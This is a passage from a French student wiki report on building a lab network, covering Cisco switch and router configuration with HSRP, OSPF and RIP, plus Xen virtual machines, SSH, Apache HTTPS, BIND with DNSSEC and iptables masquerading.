|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
 interface BDI300&lt;br /&gt;
  ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
